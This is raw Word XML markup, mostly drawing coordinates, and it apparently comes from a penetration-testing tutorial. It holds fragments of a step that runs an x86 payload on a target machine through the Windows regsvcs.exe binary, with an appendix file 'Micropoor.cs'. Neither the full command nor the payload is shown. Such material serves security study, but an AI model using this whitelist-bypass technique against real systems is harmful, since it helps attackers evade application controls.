10,8668,1510,8668,1510,8668,1510,8668,1510,8668,1510,8668,1510,8668,1510,8668,1510,8668,1510,8668,1510,8668,1510,8668,1510,8668,1510,8668,1510,8667,1510,8667,1510,8667,1510,8667,1510,8666,1510,8666,1510,8666,1510,8665,1510,8665,1510,8664,1510,8663,1510,8663,1510,8662,1510,8661,1510,8660,1510,8660,1510,8659,1510,8658,1510,8656,1510,8655,1510,8654,1510,8653,1510,8651,1510,8650,1510,8648,1510,8646,1510,8645,1510,8643,1510,8641,1510,8639,1510,8637,1510,8634,1510,8632,1510,8629,1510,8627,1510,8624,1510,8621,1510,8618,1510,8615,1510,8612,1510,8609,1510,8605,1510,8602,1510,8598,1510,8594,1510,8590,1510,8586,1510,8582,1510,8577,1510,8573,1510,8568,1510,8563,1510,8558,1510,8553,1510,8548,1510,8542,1510,8537,1510,8531,1510,8525,1510,8519,1510,8512,1510,8506,1510,8499,1510,8492,1510,8485,1510,8478,1510,8471,1510,8463,1510,8455,1510,8447,1510,8439,1510,8431,1510,8422,1510,8413,1510,8404,1510,8395,1510,8386,1510,8376,1510,8366,1510,8356,1510,8346,1510,8336,1510,8325,1510,8314,1510,8303,1510,8291,1510,8280,1510,8268,1510,8255,1510,8243,1510,8230,1510,8218,1510,8204,1510,8191,1510,8177,1510,8164,1510,8149,1510,8135,1510,8120,1510,8105,1510,8090,1510,8075,1510,8059,1510,8043,1510,8027,1510,8010,1510,7993e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:399.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7990" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:7990;width:8990;height:10" coordorigin="1490,7990" coordsize="8990,10" path="m1510,8001l1510,8001,1510,8001,1510,8001,1510,8001,1510,8001,1510,8001,1511,8001,1512,8001,1512,8001,1514,8001,1515,8001,1517,8001,1519,8001,1521,8001,1524,8001,1528,8001,1532,8001,1536,8001,1541,8001,1546,8001,1552,8001,1559,8001,1566,8001,1575,8001,1583,8001,1593,8001,1603,8001,1615,8001,1627,8001,1640,8001,1654,8001,1668,8001,1684,8001,1701,8001,1719,8001,1738,8001,1758,8001,1780,8001,1802,8001,1826,8001,1851,8001,1877,8001,1904,8001,1933,8001,1963,8001,1995,8001,2028,8001,2063,8001,2099,8001,2136,8001,2175,8001,2216,8001,2259,8001,2303,8001,2348,8001,2396,8001,2445,8001,2496,8001,2549,8001,2604,8001,2660,8001,2719,8001,2779,8001,2841,8001,2906,8001,2972,8001,3041,8001,3112,8001,3184,8001,3259,8001,3336,8001,3416,8001,3498,8001,3582,8001,3668,8001,3757,8001,3848,8001,3941,8001,4037,8001,4136,8001,4236,8001,4340,8001,4446,8001,4555,8001,4666,8001,4780,8001,4897,8001,5017,8001,5139,8001,5264,8001,5392,8001,5523,8001,5657,8001,5793,8001,5933,8001,6076,8001,6222,8001,6370,8001,6522,8001,6677,8001,6835,8001,6997,8001,7161,8001,7329,8001,7500,8001,7675,8001,7853,8001,8034,8001,8219,8001,8407,8001,8598,8001,8793,8001,8992,8001,9194,8001,9400,8001,9609,8001,9823,8001,10039,8001,10260,8001,10484,8001e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:432.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8650" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:8650;width:8990;height:10" coordorigin="1490,8650" coordsize="8990,10" path="m1510,8661l1510,8661,1510,8661,1510,8661,1510,8661,1510,8661,1510,8661,1511,8661,1512,8661,1512,8661,1514,8661,1515,8661,1517,8661,1519,8661,1521,8661,1524,8661,1528,8661,1532,8661,1536,8661,1541,8661,1546,8661,1552,8661,1559,8661,1566,8661,1575,8661,1583,8661,1593,8661,1603,8661,1615,8661,1627,8661,1640,8661,1654,8661,1668,8661,1684,8661,1701,8661,1719,8661,1738,8661,1758,8661,1780,8661,1802,8661,1826,8661,1851,8661,1877,8661,1904,8661,1933,8661,1963,8661,1995,8661,2028,8661,2063,8661,2099,8661,2136,8661,2175,8661,2216,8661,2259,8661,2303,8661,2348,8661,2396,8661,2445,8661,2496,8661,2549,8661,2604,8661,2660,8661,2719,8661,2779,8661,2841,8661,2906,8661,2972,8661,3041,8661,3112,8661,3184,8661,3259,8661,3336,8661,3416,8661,3498,8661,3582,8661,3668,8661,3757,8661,3848,8661,3941,8661,4037,8661,4136,8661,4236,8661,4340,8661,4446,8661,4555,8661,4666,8661,4780,8661,4897,8661,5017,8661,5139,8661,5264,8661,5392,8661,5523,8661,5657,8661,5793,8661,5933,8661,6076,8661,6222,8661,6370,8661,6522,8661,6677,8661,6835,8661,6997,8661,7161,8661,7329,8661,7500,8661,7675,8661,7853,8661,8034,8661,8219,8661,8407,8661,8598,8661,8793,8661,8992,8661,9194,8661,9400,8661,9609,8661,9823,8661,10039,8661,10260,8661,10484,8661e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:398.400pt;width:445.800pt;height:34.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:289.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:453.600pt;width:467.400pt;height:217.800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97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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：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C:\Windows\Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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NET\Framework\v4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.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0.30319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\regsvcs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Micropoor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-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>l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19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8459" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>附录：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Micropoor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.cs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：x86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-39"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload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49.999pt;width:0.0pt;height:792.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,1000" coordsize="0,15840">
        <v:shape style="position:absolute;left:10402;top:1000;width:0;height:15840" coordorigin="10402,1000" coordsize="0,15840" path="m10402,1000l10402,1000,10402,1000,10402,1000,10402,1000,10402,1000,10402,1001,10402,1002,10402,1003,10402,1004,10402,1006,10402,1009,10402,1012,10402,1016,10402,1020,10402,1025,10402,1031,10402,1038,10402,1046,10402,1054,10402,1064,10402,1075,10402,1087,10402,1100,10402,1114,10402,1129,10402,1146,10402,1165,10402,1185,10402,1206,10402,1229,10402,1253,10402,1280,10402,1308,10402,1337,10402,1369,10402,1403,10402,1438,10402,1476,10402,1515,10402,1557,10402,1601,10402,1647,10402,1696,10402,1747,10402,1800,10402,1856,10402,1914,10402,1975,10402,2039,10402,2105,10402,2174,10402,2246,10402,2321,10402,2399,10402,2480,10402,2563,10402,2650,10402,2740,10402,2833,10402,2930,10402,3030,10402,3133,10402,3240,10402,3350,10402,3464,10402,3581,10402,3702,10402,3827,10402,3955,10402,4087,10402,4224,10402,4364,10402,4508,10402,4656,10402,4808,10402,4965,10402,5126,10402,5291,10402,5460,10402,5634,10402,5812,10402,5995,10402,6182,10402,6374,10402,6571,10402,6772,10402,6978,10402,7189,10402,7405,10402,7626,10402,7852,10402,8083,10402,8319,10402,8560,10402,8807,10402,9059,10402,9316,10402,9578,10402,9846,10402,10120,10402,10399,10402,10684,10402,10975,10402,11271,10402,11573,10402,11881,10402,12195,10402,12515,10402,12840,10402,13172,10402,13511,10402,13855,10402,14205,10402,14562,10402,14926,10402,15295,10402,15671,10402,16054,10402,16444,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:47.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,950">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:950" coordorigin="1490,970" coordsize="8990,95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1,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1012,10484,1013,10484,1014,10484,1016,10484,1018,10484,1019,10484,1021,10484,1023,10484,1025,10484,1027,10484,1030,10484,1032,10484,1035,10484,1038,10484,1040,10484,1043,10484,1047,10484,1050,10484,1053,10484,1057,10484,1061,10484,1064,10484,1069,10484,1073,10484,1077,10484,1082,10484,1086,10484,1091,10484,1096,10484,1102,10484,1107,10484,1113,10484,1119,10484,1125,10484,1131,10484,1138,10484,1144,10484,1151,10484,1158,10484,1166,10484,1173,10484,1181,10484,1189,10484,1197,10484,1206,10484,1214,10484,1223,10484,1232,10484,1242,10484,1252,10484,1262,10484,1272,10484,1282,10484,1293,10484,1304,10484,1315,10484,1327,10484,1339,10484,1351,10484,1363,10484,1376,10484,1389,10484,1402,10484,1416,10484,1429,10484,1444,10484,1458,10484,1473,10484,1488,10484,1503,10484,1519,10484,1535,10484,1552,10484,1568,10484,1585,10484,1603,10484,1621,10484,1639,10484,1657,10484,1676,10484,1695,10484,1715,10484,1734,10484,1755,10484,1775,10484,1796,10484,1818,10484,1839,10484,1861,10484,1884,10484,1907,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10483,1930,10482,1930,10482,1930,10480,1930,10479,1930,10477,1930,10475,1930,10473,1930,10470,1930,10466,1930,10462,1930,10458,1930,10453,1930,10448,1930,10442,1930,10435,1930,10428,1930,10419,1930,10411,1930,10401,1930,10391,1930,10379,1930,10367,1930,10354,1930,10340,1930,10326,1930,10310,1930,10293,1930,10275,1930,10256,1930,10236,1930,10215,1930,10192,1930,10168,1930,10143,1930,10117,1930,10090,1930,10061,1930,10031,1930,9999,1930,9966,1930,9931,1930,9895,1930,9858,1930,9819,1930,9778,1930,9735,1930,9691,1930,9646,1930,9598,1930,9549,1930,9498,1930,9445,1930,9391,1930,9334,1930,9275,1930,9215,1930,9153,1930,9088,1930,9022,1930,8953,1930,8883,1930,8810,1930,8735,1930,8658,1930,8578,1930,8497,1930,8413,1930,8326,1930,8238,1930,8146,1930,8053,1930,7957,1930,7859,1930,7758,1930,7654,1930,7548,1930,7439,1930,7328,1930,7214,1930,7097,1930,6977,1930,6855,1930,6730,1930,6602,1930,6471,1930,6337,1930,6201,1930,6061,1930,5918,1930,5773,1930,5624,1930,5472,1930,5317,1930,5159,1930,4997,1930,4833,1930,4665,1930,4494,1930,4319,1930,4141,1930,3960,1930,3776,1930,3587,1930,3396,1930,3201,1930,3002,1930,2800,1930,2594,1930,2385,1930,2172,1930,1955,1930,1734,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1929,1510,1929,1510,1929,1510,1929,1510,1928,1510,1928,1510,1928,1510,1927,1510,1927,1510,1926,1510,1926,1510,1925,1510,1924,1510,1923,1510,1922,1510,1921,1510,1920,1510,1919,1510,1918,1510,1917,1510,1915,1510,1914,1510,1912,1510,1910,1510,1908,1510,1906,1510,1904,1510,1902,1510,1900,1510,1897,1510,1895,1510,1892,1510,1889,1510,1886,1510,1883,1510,1880,1510,1876,1510,1873,1510,1869,1510,1865,1510,1861,1510,1857,1510,1852,1510,1848,1510,1843,1510,1838,1510,1833,1510,1828,1510,1822,1510,1817,1510,1811,1510,1805,1510,1798,1510,1792,1510,1785,1510,1778,1510,1771,1510,1764,1510,1756,1510,1749,1510,1741,1510,1732,1510,1724,1510,1715,1510,1706,1510,1697,1510,1688,1510,1678,1510,1668,1510,1658,1510,1647,1510,1637,1510,1626,1510,1614,1510,1603,1510,1591,1510,1579,1510,1566,1510,1554,1510,1541,1510,1527,1510,1514,1510,1500,1510,1486,1510,1471,1510,1457,1510,1441,1510,1426,1510,1410,1510,1394,1510,1378,1510,1361,1510,1344,1510,1327,1510,1309,1510,1291,1510,1272,1510,1254,1510,1234,1510,1215,1510,1195,1510,1175,1510,1154,1510,1133,1510,1112,1510,1090,1510,1068,1510,1046,1510,1023,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:445.800pt;height:47.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:95.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1910" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1910;width:8990;height:370" coordorigin="1490,1910" coordsize="8990,370" path="m1510,1930l1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1511,1930,1512,1930,1512,1930,1514,1930,1515,1930,1517,1930,1519,1930,1521,1930,1524,1930,1528,1930,1532,1930,1536,1930,1541,1930,1546,1930,1552,1930,1559,1930,1566,1930,1575,1930,1583,1930,1593,1930,1603,1930,1615,1930,1627,1930,1640,1930,1654,1930,1668,1930,1684,1930,1701,1930,1719,1930,1738,1930,1758,1930,1780,1930,1802,1930,1826,1930,1851,1930,1877,1930,1904,1930,1933,1930,1963,1930,1995,1930,2028,1930,2063,1930,2099,1930,2136,1930,2175,1930,2216,1930,2259,1930,2303,1930,2348,1930,2396,1930,2445,1930,2496,1930,2549,1930,2604,1930,2660,1930,2719,1930,2779,1930,2841,1930,2906,1930,2972,1930,3041,1930,3112,1930,3184,1930,3259,1930,3336,1930,3416,1930,3498,1930,3582,1930,3668,1930,3757,1930,3848,1930,3941,1930,4037,1930,4136,1930,4236,1930,4340,1930,4446,1930,4555,1930,4666,1930,4780,1930,4897,1930,5017,1930,5139,1930,5264,1930,5392,1930,5523,1930,5657,1930,5793,1930,5933,1930,6076,1930,6222,1930,6370,1930,6522,1930,6677,1930,6835,1930,6997,1930,7161,1930,7329,1930,7500,1930,7675,1930,7853,1930,8034,1930,8219,1930,8407,1930,8598,1930,8793,1930,8992,1930,9194,1930,9400,1930,9609,1930,9823,1930,10039,1930,10260,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1931,10484,1931,10484,1931,10484,1931,10484,1931,10484,1931,10484,1932,10484,1932,10484,1932,10484,1933,10484,1933,10484,1933,10484,1934,10484,1934,10484,1935,10484,1935,10484,1936,10484,1936,10484,1937,10484,1938,10484,1938,10484,1939,10484,1940,10484,1941,10484,1942,10484,1943,10484,1944,10484,1945,10484,1946,10484,1947,10484,1948,10484,1949,10484,1951,10484,1952,10484,1954,10484,1955,10484,1957,10484,1958,10484,1960,10484,1962,10484,1964,10484,1966,10484,1968,10484,1970,10484,1972,10484,1974,10484,1976,10484,1978,10484,1981,10484,1983,10484,1986,10484,1989,10484,1991,10484,1994,10484,1997,10484,2000,10484,2003,10484,2006,10484,2010,10484,2013,10484,2017,10484,2020,10484,2024,10484,2028,10484,2031,10484,2035,10484,2039,10484,2044,10484,2048,10484,2052,10484,2057,10484,2061,10484,2066,10484,2071,10484,2076,10484,2081,10484,2086,10484,2091,10484,2096,10484,2102,10484,2107,10484,2113,10484,2119,10484,2125,10484,2131,10484,2137,10484,2144,10484,2150,10484,2157,10484,2164,10484,2170,10484,2177,10484,2185,10484,2192,10484,2199,10484,2207,10484,2214,10484,2222,10484,2230,10484,2238,10484,2247,10484,2255,10484,2264,10484,2272,10484,2281,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10483,2290,10482,2290,10482,2290,10480,2290,10479,2290,10477,2290,10475,2290,10473,2290,10470,2290,10466,2290,10462,2290,10458,2290,10453,2290,10448,2290,10442,2290,10435,2290,10428,2290,10419,2290,10411,2290,10401,2290,10391,2290,10379,2290,10367,2290,10354,2290,10340,2290,10326,2290,10310,2290,10293,2290,10275,2290,10256,2290,10236,2290,10215,2290,10192,2290,10168,2290,10143,2290,10117,2290,10090,2290,10061,2290,10031,2290,9999,2290,9966,2290,9931,2290,9895,2290,9858,2290,9819,2290,9778,2290,9735,2290,9691,2290,9646,2290,9598,2290,9549,2290,9498,2290,9445,2290,9391,2290,9334,2290,9275,2290,9215,2290,9153,2290,9088,2290,9022,2290,8953,2290,8883,2290,8810,2290,8735,2290,8658,2290,8578,2290,8497,2290,8413,2290,8326,2290,8238,2290,8146,2290,8053,2290,7957,2290,7859,2290,7758,2290,7654,2290,7548,2290,7439,2290,7328,2290,7214,2290,7097,2290,6977,2290,6855,2290,6730,2290,6602,2290,6471,2290,6337,2290,6201,2290,6061,2290,5918,2290,5773,2290,5624,2290,5472,2290,5317,2290,5159,2290,4997,2290,4833,2290,4665,2290,4494,2290,4319,2290,4141,2290,3960,2290,3776,2290,3587,2290,3396,2290,3201,2290,3002,2290,2800,2290,2594,2290,2385,2290,2172,2290,1955,2290,1734,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2289,1510,2289,1510,2289,1510,2289,1510,2289,1510,2288,1510,2288,1510,2288,1510,2288,1510,2287,1510,2287,1510,2286,1510,2286,1510,2285,1510,2285,1510,2284,1510,2284,1510,2283,1510,2282,1510,2282,1510,2281,1510,2280,1510,2279,1510,2278,1510,2277,1510,2276,1510,2275,1510,2274,1510,2273,1510,2272,1510,2271,1510,2269,1510,2268,1510,2267,1510,2265,1510,2263,1510,2262,1510,2260,1510,2258,1510,2256,1510,2255,1510,2253,1510,2251,1510,2248,1510,2246,1510,2244,1510,2242,1510,2239,1510,2237,1510,2234,1510,2231,1510,2229,1510,2226,1510,2223,1510,2220,1510,2217,1510,2214,1510,2210,1510,2207,1510,2204,1510,2200,1510,2196,1510,2193,1510,2189,1510,2185,1510,2181,1510,2177,1510,2172,1510,2168,1510,2163,1510,2159,1510,2154,1510,2149,1510,2144,1510,2139,1510,2134,1510,2129,1510,2124,1510,2118,1510,2113,1510,2107,1510,2101,1510,2095,1510,2089,1510,2083,1510,2076,1510,2070,1510,2063,1510,2057,1510,2050,1510,2043,1510,2036,1510,2028,1510,2021,1510,2013,1510,2006,1510,1998,1510,1990,1510,1982,1510,1973,1510,1965,1510,1957,1510,1948,1510,1939,1510,1930e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:95.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1910" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:1910;width:30;height:370" coordorigin="1490,1910" coordsize="30,370" path="m1517,1930l1517,1930,1517,1930,1517,1930,1517,1930,1517,1930,1517,1930,1517,1930,1517,1930,1517,1930,1517,1930,1517,1930,1517,1930,1517,1930,1517,1930,1517,1931,1517,1931,1517,1931,1517,1931,1517,1931,1517,1931,1517,1932,1517,1932,1517,1932,1517,1933,1517,1933,1517,1933,1517,1934,1517,1934,1517,1935,1517,1935,1517,1936,1517,1936,1517,1937,1517,1938,1517,1938,1517,1939,1517,1940,1517,1941,1517,1942,1517,1943,1517,1944,1517,1945,1517,1946,1517,1947,1517,1948,1517,1949,1517,1951,1517,1952,1517,1954,1517,1955,1517,1957,1517,1958,1517,1960,1517,1962,1517,1964,1517,1966,1517,1968,1517,1970,1517,1972,1517,1974,1517,1976,1517,1978,1517,1981,1517,1983,1517,1986,1517,1989,1517,1991,1517,1994,1517,1997,1517,2000,1517,2003,1517,2006,1517,2010,1517,2013,1517,2017,1517,2020,1517,2024,1517,2028,1517,2031,1517,2035,1517,2039,1517,2044,1517,2048,1517,2052,1517,2057,1517,2061,1517,2066,1517,2071,1517,2076,1517,2081,1517,2086,1517,2091,1517,2096,1517,2102,1517,2107,1517,2113,1517,2119,1517,2125,1517,2131,1517,2137,1517,2144,1517,2150,1517,2157,1517,2164,1517,2170,1517,2177,1517,2185,1517,2192,1517,2199,1517,2207,1517,2214,1517,2222,1517,2230,1517,2238,1517,2247,1517,2255,1517,2264,1517,2272,1517,2281,1517,2290e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:113.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2270" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:2270;width:8990;height:390" coordorigin="1490,2270" coordsize="8990,390" path="m1510,2290l1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1511,2290,1512,2290,1512,2290,1514,2290,1515,2290,1517,2290,1519,2290,1521,2290,1524,2290,1528,2290,1532,2290,1536,2290,1541,2290,1546,2290,1552,2290,1559,2290,1566,2290,1575,2290,1583,2290,1593,2290,1603,2290,1615,2290,1627,2290,1640,2290,1654,2290,1668,2290,1684,2290,1701,2290,1719,2290,1738,2290,1758,2290,1780,2290,1802,2290,1826,2290,1851,2290,1877,2290,1904,2290,1933,2290,1963,2290,1995,2290,2028,2290,2063,2290,2099,2290,2136,2290,2175,2290,2216,2290,2259,2290,2303,2290,2348,2290,2396,2290,2445,2290,2496,2290,2549,2290,2604,2290,2660,2290,2719,2290,2779,2290,2841,2290,2906,2290,2972,2290,3041,2290,3112,2290,3184,2290,3259,2290,3336,2290,3416,2290,3498,2290,3582,2290,3668,2290,3757,2290,3848,2290,3941,2290,4037,2290,4136,2290,4236,2290,4340,2290,4446,2290,4555,2290,4666,2290,4780,2290,4897,2290,5017,2290,5139,2290,5264,2290,5392,2290,5523,2290,5657,2290,5793,2290,5933,2290,6076,2290,6222,2290,6370,2290,6522,2290,6677,2290,6835,2290,6997,2290,7161,2290,7329,2290,7500,2290,7675,2290,7853,2290,8034,2290,8219,2290,8407,2290,8598,2290,8793,2290,8992,2290,9194,2290,9400,2290,9609,2290,9823,2290,10039,2290,10260,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2291,10484,2291,10484,2291,10484,2291,10484,2291,10484,2291,10484,2291,10484,2292,10484,2292,10484,2292,10484,2293,10484,2293,10484,2293,10484,2294,10484,2294,10484,2295,10484,2295,10484,2296,10484,2296,10484,2297,10484,2297,10484,2298,10484,2299,10484,2300,10484,2301,10484,2301,10484,2302,10484,2303,10484,2304,10484,2305,10484,2307,10484,2308,10484,2309,10484,2310,10484,2312,10484,2313,10484,2315,10484,2316,10484,2318,10484,2320,10484,2321,10484,2323,10484,2325,10484,2327,10484,2329,10484,2331,10484,2334,10484,2336,10484,2338,10484,2341,10484,2343,10484,2346,10484,2349,10484,2351,10484,2354,10484,2357,10484,2360,10484,2363,10484,2367,10484,2370,10484,2373,10484,2377,10484,2380,10484,2384,10484,2388,10484,2392,10484,2396,10484,2400,10484,2404,10484,2408,10484,2413,10484,2417,10484,2422,10484,2427,10484,2432,10484,2437,10484,2442,10484,2447,10484,2452,10484,2458,10484,2464,10484,2469,10484,2475,10484,2481,10484,2487,10484,2493,10484,2500,10484,2506,10484,2513,10484,2520,10484,2526,10484,2533,10484,2541,10484,2548,10484,2555,10484,2563,10484,2571,10484,2578,10484,2586,10484,2595,10484,2603,10484,2611,10484,2620,10484,2629,10484,2638,10484,2647,10484,2656,10484,2665,10484,2665,10484,2665,10484,2665,10484,2665,10484,2665,10484,2665,10483,2665,10482,2665,10482,2665,10480,2665,10479,2665,10477,2665,10475,2665,10473,2665,10470,2665,10466,2665,10462,2665,10458,2665,10453,2665,10448,2665,10442,2665,10435,2665,10428,2665,10419,2665,10411,2665,10401,2665,10391,2665,10379,2665,10367,2665,10354,2665,10340,2665,10326,2665,10310,2665,10293,2665,10275,2665,10256,2665,10236,2665,10215,2665,10192,2665,10168,2665,10143,2665,10117,2665,10090,2665,10061,2665,10031,2665,9999,2665,9966,2665,9931,2665,9895,2665,9858,2665,9819,2665,9778,2665,9735,2665,9691,2665,9646,2665,9598,2665,9549,2665,9498,2665,9445,2665,9391,2665,9334,2665,9275,2665,9215,2665,9153,2665,9088,2665,9022,2665,8953,2665,8883,2665,8810,2665,8735,2665,8658,2665,8578,2665,8497,2665,8413,2665,8326,2665,8238,2665,8146,2665,8053,2665,7957,2665,7859,2665,7758,2665,7654,2665,7548,2665,7439,2665,7328,2665,7214,2665,7097,2665,6977,2665,6855,2665,6730,2665,6602,2665,6471,2665,6337,2665,6201,2665,6061,2665,5918,2665,5773,2665,5624,2665,5472,2665,5317,2665,5159,2665,4997,2665,4833,2665,4665,2665,4494,2665,4319,2665,4141,2665,3960,2665,3776,2665,3587,2665,3396,2665,3201,2665,3002,2665,2800,2665,2594,2665,2385,2665,2172,2665,1955,2665,1734,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2665,1510,2664,1510,2664,1510,2664,1510,2664,1510,2664,1510,2663,1510,2663,1510,2663,1510,2662,1510,2662,1510,2661,1510,2661,1510,2660,1510,2660,1510,2659,1510,2659,1510,2658,1510,2657,1510,2657,1510,2656,1510,2655,1510,2654,1510,2653,1510,2652,1510,2651,1510,2650,1510,2649,1510,2648,1510,2646,1510,2645,1510,2644,1510,2642,1510,2641,1510,2639,1510,2638,1510,2636,1510,2634,1510,2632,1510,2630,1510,2628,1510,2626,1510,2624,1510,2622,1510,2620,1510,2617,1510,2615,1510,2612,1510,2610,1510,2607,1510,2604,1510,2601,1510,2598,1510,2595,1510,2592,1510,2589,1510,2586,1510,2582,1510,2579,1510,2575,1510,2571,1510,2568,1510,2564,1510,2560,1510,2556,1510,2551,1510,2547,1510,2543,1510,2538,1510,2533,1510,2529,1510,2524,1510,2519,1510,2514,1510,2508,1510,2503,1510,2498,1510,2492,1510,2486,1510,2480,1510,2474,1510,2468,1510,2462,1510,2456,1510,2449,1510,2443,1510,2436,1510,2429,1510,2422,1510,2415,1510,2408,1510,2400,1510,2393,1510,2385,1510,2377,1510,2369,1510,2361,1510,2353,1510,2344,1510,2335,1510,2327,1510,2318,1510,2309,1510,2300,1510,2290e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:113.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2270" coordsize="30,390">
